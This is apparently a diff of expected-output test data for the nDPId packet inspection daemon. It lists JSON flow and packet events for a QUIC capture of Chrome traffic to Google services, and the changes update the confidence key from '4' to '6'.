02313{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1621433283660,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621433283660,"pkt":"AAAAAAAAAAEAU0VlCABFAAViM6RAAH4RJaGokEAFmWIcTujmAbsFTq3rwf8AAB0Iz5STt1Y1cC0ANwDFPRNS\/+a+ehucrc3Cy3E4zimx6Se5x9S2Dy\/Gdsrzx5YFrAfk\/P5DuuwrPRCPOU3BXGhgTB5E\/e3sUYmzAEVTAuBYpB\/Z\/1ehiztmkudlkpmIe8TV88KuQZdgMCFwpkxLuaxS1ziTCHLi1IPv4lk79c5Z0ULFtJLLvCInJMRjcd6mMGJScqPLX\/oX54gz8qU\/6Qz4haz6hp+OoT4jjUoHwXKwZdcJIPU1d0Fgj9BSxoZMC3uUZUh6\/nSO1JIplWk20Jn+EdrtXf9IF3Neg2QP7WN48TjKFEWh8rRXUGGVZwXfgyZ4u67st5aDs9WYZrXzKxk1nJVUFJMK02b+yKanwM95M5gyBaP7fEbsz3G93Jc14HIS+TZPmXtQf0GDj7Mvht+3zbNTk\/o4VaawVm8AXrpyWNWavSleSlFtm32amXDcWcXBAXyviKq\/ZxOJHsOe0hRNn8R9DKEAdOiVzWHc7gKLyh2t\/TJ5RZvARNmvpppZ6wGihiLhcw7ZfxEeTZuIMl2vCqdlmdPL9rAcodDnH3cPQgNcH7hxThB++pzk4xpGMH6II4XWKGZRVIss+xX363+BpzZ84mO8AvFYpM2G1yOSewM2tyHJJjvt5tVaanjhIHX91fgLX\/FiKYxmMGxgXGOHydnptpnm23dOt0b9WZvjKRdNovSQvIwMupd1UWFxikqzvsb7A4rsAUyXLWIzvzBBk7394MKzqD+owlnrzPcWgMnz22akkOeqa\/r7Uc1zdnb\/xMYpRLj6j\/VJPcZxgWSF\/P4Qtjjh5xSMS7E0SpcbJG3qGTIvbs9UGrdVGQOvITRNq5BHB25231B8uXSwZZ2OfP4kX6XjlMWXbP+uJQMmZTGglRloO+dA6aqTrTy9krXaEQKMk1DpabL8dpFus+hC79SbtQRB2+q+kl1BPR+TLeqOsYPTKcukPf2WREttP39G\/t9VQQCU\/rrFLKNTWUuaicuTglon\/iwyuggUyLgAJ5TOQSh3AwDysJj81Jj8yy\/XVRc+Ow92NtvThIEXi2BqpMI0pLfvsZgTdjiOUTaj4nR5+SLJt0aFTQqUXp4O4\/J8uybiTqPwgzFfEz23lP4SecnmMrwFjOkjPHhXc3\/7rEUmZh2scM1CaQnd8xqX1Byg\/aXBz51V4uicTZLxtfg75bBVl3kelSzZJu+XqjxdL+n9CzfZbtFpXbsW2S+Q4+jDNeJp4HBqG06R4FxxFevo8pd0keFBmX69U1z3Wq3sokxVvxe8+dpn6prJlOSracYX8yZoELER11iW2n6aiIPlofm1lWs6hUzVqnPotYA\/DykZqsMhurgWD4MoqHtW4DHKc5Bn5KWc\/OJK60z5e9EaP9fvLRfYouPq78UI388ELbk719D+pp1WijPL3R0TEvj7ae26qCBSAEds62fCV+P4XZ5x0eUy1+pBImuibzJy0Qqd7jHkHbgRa8FGmj\/X2+xPfVMG8h0AOMqH9w0rUvMze6gprpf\/7tktIfCTqw2Qj6+Gkt7WnBilpUaFfwjZrooYmfJ0DMITDqenN\/N95DqoILT6NKoG8ZEuXufJTYTBtIQQURklCzYwU+bVBfdZZKhXs38KMloqNck1yXZTWMqx0XcaKtPF38dzgU97G+ewHG\/d4QBFblkENQ59GekuwL0tajlQ1a5yv41R4OjF\/og3TAJBWTrUQFopI3FvTMPDLJkxnep4Xrtt3D9pwmCEDc5Asj6CgulJotykyE2uPE6yOnzV6YWwiNzS7S0bLajRUqyRCV2dgZXZaKJvRpr1CHOH"} -00922{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":58,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433283660,"flow_last_seen":1621433283660,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433283660,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":59622,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"},"quic": {"client_requested_server_name":"dns.google","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} -00742{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":59,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621433096272,"flow_last_seen":1621433096272,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433283660,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":62818,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} -00727{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":59,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1621433005013,"flow_last_seen":1621433005304,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":2700,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433283660,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"168.78.153.39","src_port":35124,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} -00745{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":59,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621433067725,"flow_last_seen":1621433067725,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433283660,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"117.148.117.30","src_port":51075,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"}} -00735{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":59,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621433067996,"flow_last_seen":1621433067996,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433283660,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"87.179.155.149","src_port":49689,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} +00922{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":58,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433283660,"flow_last_seen":1621433283660,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433283660,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":59622,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"},"quic": {"client_requested_server_name":"dns.google","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} +00742{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":59,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621433096272,"flow_last_seen":1621433096272,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433283660,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":62818,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} +00727{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":59,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1621433005013,"flow_last_seen":1621433005304,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":2700,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433283660,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"168.78.153.39","src_port":35124,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00745{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":59,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621433067725,"flow_last_seen":1621433067725,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433283660,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"117.148.117.30","src_port":51075,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"}} +00735{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":59,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621433067996,"flow_last_seen":1621433067996,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433283660,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"87.179.155.149","src_port":49689,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} 00633{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":59,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433300632,"flow_last_seen":1621433300632,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433300632,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"108.171.138.182","src_port":50552,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02308{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1621433300632,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621433300632,"pkt":"AAAAAAAAAAEASYHhCABFAAViwQFAAH4RVpKokEAFbKuKtsV4AbsFTpawy\/8AAB0IVc00l\/iOZRgANwACoQTdl\/GOABSj5yQ9HIigBgYJdQCUTNlANM6rqxfD5723bzbrUxaSqL+QgfFYDvSs2HF+3FZE\/TQjSbe4Km8KzftRRJ7WGWJLHVZGU6Pr8JJ9uxzBXyE3XW+2zfcSO0pInvNKKnyglyrBYAu3eLKCvMOF\/lcR22wWFyI78zQm\/U4997pUpU3IeDVTo+1apB0IH0pVnXk0s\/DcR6kAfTOaqckpKyJM+iypk884UqXCF7zKL7SZD4uGN8XS+r+vfGpyWarYF8YuRePoaTXkOZ60muMhm0jUocNqY\/U5XaGTP2BXnULnONu5tCViE2swJ5RpifKQhW0ajmcYyvMPByIkayNlHx+wVxBbD59Qy32KgOOXFf4bk8hLtiTkWyRCqp\/0xL9c3Vfn26VBZY5CoyUtdJBdTk8G94oF5RXnKlsW9RPQGN8PNrTlnxYqCMvKdLymzbrkSaVHd1s6hCDMlvKgPIqlyVPjyv7VwNwgypSmNGQjl2iP6PboGwtXnIpa5ka4IFOHhKblDAPYAGuoR3WhJLHbWPOhkpp2xAZBtIdfGz88WUhh\/fa+5OHfzxRvv\/+98pKocB5KIs+9XaMOM2b4ye775waBhKUHBxzU5chSbpQbjGNQ7UgHntGkQrLxRrgYK30BHeCwGqbB3O3zTGi28fjy0q+DQxv58s+isMuLf4rVml1bN6YCm+6tCQu1csCemJ3W1KsCnXf1iNt4C16k4KuAk4uDPh5S1ikxcI8fbKjrNcKeqP+jUu0A0AQxq4tHOgVeVJ99xXNa0rfYRr+KcbfwK2f3GdLGTda3yUnSVSryfyKJvL2Q+8aLblgUuM6hiD+LekvE\/LlAnbBjLmD8wu4FP2UzL6qUbY58f\/mCvQGgHeRTMEUd4CowlgXPUdhQWeaDlfMLg9lfb0LA68XuyJmqrdq5bG2Bep8ngxyxEBYvezuPAC2Iz5rBy\/4kms+yRvo6kVIbiyCCpXtTDJRUyNmBT3rPW48C4LpJYm\/ICdZMpWdD0UGNtBqPhJE7WKkKOsCkPGnUmiGgDd0pjw+lR7ks28tZEyD2kzjPP7ttelpXI8vPVVoY4UZaApsgyum\/R33EOq89AHxrj6xsKtkVzUTlVCJby5kmDowFpY3WvjB3YKxK7u66vXI2uvpgNuceSN\/6K8VLUZARSSeqan2EPUjPwc8NG39Volpuo\/q6ci4X3xaY\/VIhhzOX0GkrQnDUt567z9VlzQJpCGMRaukTO8AYWCEgkfoe6nxM2l6atxd1xrKaWQ5J1s4Fb+l3ui1owS2vTplZ4RPYsayHMQAz9JTj3HW7PvghKUdzoLY3MmV80zisuPXVZXwU2r9a1f+c1uKlxlSpPR66onFKZZdWkDXHMs5slBPZ3cct6OQSpk1E+HaV0eC8NipyKySEkKnwHTUZdNtCvNWU+DfIdSY+5S7vDR\/kAFS+UkA+axllbFzhbZjbE98MSmiyGeojTXpwHvAETcKEIKQ42DITA7olKjQ58qBoakQBY2QIe2\/X\/a+1Rz3Qpmpf5f\/LIHyY8CJTH6Pguykmu8PZ2YjeCHh9nc4aZI\/D5huo5lq5GzxgnUbuvAghp+1jKsnjdIBsSbRH5Ax5Q1NaysWgoo4eoeRiE97DOBD3dFTT0U9rGH\/b9BWCRjOHVrT0xAYjOVJ9vKjsh\/uQE3RymgcpL9m+XSdoP7juYR415Wg2Oqxg61mfx+maFmAF5FUVl8xb42RdcnTELYsROvNQ5WWEs8jmQMghLxKlLWKQvG8aWjfEzyaOE4xFNVsM"} -00933{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433300632,"flow_last_seen":1621433300632,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433300632,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"108.171.138.182","src_port":50552,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"beacons.gvt2.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} -00728{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":60,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621433110371,"flow_last_seen":1621433110371,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433300632,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"125.136.204.4","src_port":56425,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} +00933{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433300632,"flow_last_seen":1621433300632,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433300632,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"108.171.138.182","src_port":50552,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"beacons.gvt2.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} +00728{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":60,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621433110371,"flow_last_seen":1621433110371,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433300632,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"125.136.204.4","src_port":56425,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} 00633{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":60,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433323690,"flow_last_seen":1621433323690,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433323690,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":56844,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02314{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1621433323690,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621433323690,"pkt":"AAAAAAAAAAEAWIVLCABFAAVi+3xAAH4RF4uokEAFcfqJ894MAbsFTp8Fzf8AAB0IvzqNQD0lRtMANwAyYa5fSLdWImB4ZVjTL2NEPya1cUtwCyStcfOGkb+i0HvP10Xnx2V6173CCBLyTlS2lW3ItThE\/V6vYeQp5d8+\/LNRUHhhok6SCvxveMOhomdOJpo8G34ZKxbpZZeGXMm+kxymEvh9PGGn4vHBB6v4SwzcoQL4QdYO+oYbe4NJGodI+SmHvMckm12krbWK18PtHzoYrJftqnunvJo9ULpSRaYu2+s6djIY3q7wuNnjJvZDUe5LF2t9pFC+gvIh2yTEiqiPxPThsUMHIGShrjOrLAxZrFkrJHPByKb8fTvaZlj+Dkpvl20jckd+I0vvUZV\/2XJXbyUBPGy2tkcDameP4Y5wVjdpq6TVih2KnVLphaiRQHJibXu58TyDz0Vd9X6glZg4tYEC2iKCYEy5kUqjvrjHuGphHab1PzL06uyyN+x\/732GK6ik4JUpWyZBztoY9G7fyAAxwg6UPj487al0tVnMwp1c37Z3vKYougGLf+uVEsTYDF7Cpqu+Ea7zDIydQx7IO8f0CUfPQi\/u8\/gD4HXXAdB2qA1yUY\/VlHUe3+mmQbrEIgq8uIdDQWKYbjVC5pvQNUhxoD\/aL0ONFl\/jOVpgaM\/zL2\/ko1dyUaMhLjojLbYyekvliZ3qkxk605uj5nYxD\/OY0t4miGDxZQMnUULowLp7cbjsKiCD\/BjS+2cK+geBlIFH1XYvpAgJYFqu5\/05GxQPEqo2AZuX650wvMXpjzo7oLSb3VQ3LP6jN+3GtZQkbqO0Ml2eFlFThBeHZyyNfdgISKQXW66VXUuuUPhduLb3p5Yeuex9h\/2xxRpZf+QwTlcaySd6XeQxuyDRaiHCM6HiKDMj8VSuGyQ6y6G\/CQ2lQpqTq0JCG\/TihEgoblpCMhxGu52dI8\/M4cE6+j2XEdE4krEK2jiEaIZKGdebeUzB9JAU0IEQ368+526\/BhOh0rEXo9RUgNgTnXonlH1MQUqO1fcoXxn08UG5E6ZYKgu\/OZN1pWGWjVSWyMfCT4BqFy0DQnEk0oVfz682lYFVubZ2QMzip7UVNkMKKCepikphE4c7ppd3hkLM9bsNAktobkOkAgW2i++QQX\/bTNfJxawx6s88fmfdgIdLdYyVTIeI78VHXkUVfbHcjoQFDDnKH\/5gdBE+P5BLF4EpLHfAF4Wx974YrGRnZHnoMF43ssv3SEdPlN2iriNrn4spM4xowNSQZcUmJHTcSpU+Uat4MDUM6V4RHks5OewDlWO4kOK+6LIYgpiR+yBKe\/LrPhXG4P4O0gNUot5Mb1kSEjLXUEj\/1PtJIrIb4oS70D8+c1NIiu\/OQVFn5lEPax5\/uGndd3bG0u6aRIwsYEkaTKTgdt2ZQun3oPeubolQM1fI1tzSovLzWnNl+koBh7dhxXhgQ\/X9UAn1n9hyc5f5taxal62r3tci4Mbbx8KPZBkYFj8Mmrqc8KDSHzLCloQSWCQSCkBQZ9FMuVsXUYmlB3jRDOW7KZN2uY8kbzPbIbjPWcCvUdxdHVNDIlPdgQ\/XLcgXkYVqmy7m9JKpfEvarWH5dSTcvvBS\/j7hMNXbKyu2ZBJX6gfqjxLKsxKQggL6gi+eWunxMe\/1Z3CwjGLDysODiQjylrqRc\/i89KaJ4RMPmIB9Ni0qJzV1nr4XAGc8l7QrTQ6KvRGv+KgMs0SAAvvCG8jxH07B459x95jC8vicEuCu4Qa8+k5\/C+g6l70JY75v1dmSj7TKtkEeixX9hXhrRxZTs9Uf4IcI+X23icYMl1eKUVDfGr5SG09huGxWXyIx"} -00930{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433323690,"flow_last_seen":1621433323690,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433323690,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":56844,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Cloud"},"quic": {"client_requested_server_name":"b1.nel.goog","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} +00930{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433323690,"flow_last_seen":1621433323690,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433323690,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":56844,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Cloud"},"quic": {"client_requested_server_name":"b1.nel.goog","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} 00630{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":61,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433390651,"flow_last_seen":1621433390651,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433390651,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":58414,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02315{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1621433390651,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621433390651,"pkt":"AAAAAAAAAAEAU0VlCABFAAViM7pAAH4RJYuokEAFmWIcTuQuAbsFTrRvzv8AAB0INosFT237+MMANwBb9TwbasdQ32A5cX94fXk3R40z4mY0PhE1HEAJQYO4V6\/3tF0P2M88fsUndGz9Fr7kJKq5dvhE\/XERoYXV5NHZLSYf4DTWVhp7q1z6KYJRQxo75jUpfdEwUa6ZG+5bNu\/A5u9XKnFMFC0KCN5TT4NsPs0VPSqpEv80Khbgf8\/cxxTXZWjqluHOImCUv2NFZIJpo9CgaD0e+8GRtcXDohjn+znKXGpEH1V8b\/3kSK48z6I+6n3KVBV2xHgdOGQwwEd1q1J+ECF5KYSp9RUL0zzTscSavIziA0pSN7JIWZUep\/Ok1sLxp9ATB3LHSyV9ajz0afQRqz8lPxBfGq9y5R3BFba3C9vH70pf4yBTyQd6jqWvZyTR21R\/xl6xRf4gAhvJcYjJkxW+3lmGOhS68JXB7SBW\/j\/51vJYllmwAccGUXQGTXS5\/VWIw5VScjbKe0pa3A8a9e8Av\/ljOB\/HEfVTnsj+Y+qchpc8HO4XTQoFrPwaU8vXQ1JM66P7sQb1sco0zqaDzmitGZlUT1QWpnQr7eKksiSn9NnvNYTUvdDSSPn3PKsb2RhC9OqgtoYPKkGHpW8FvVwHYqbSyvaU3MJxUBlxuA0FvYBKTVbWO0AgmyZocUfOLKTsk\/TZfqoCD3QW7FO7lNRUo+P1rP9gFOB463DdLyAUsjehCczhWZWdGU\/gT04HidAXsnw6jARYjLJBcLpd08Td0XXQY6albr3J8ZZ9LOvShd71AaKUK4b3zzE1WCv8qtmiARodSJhVf6dZMl+yNOLSPKMo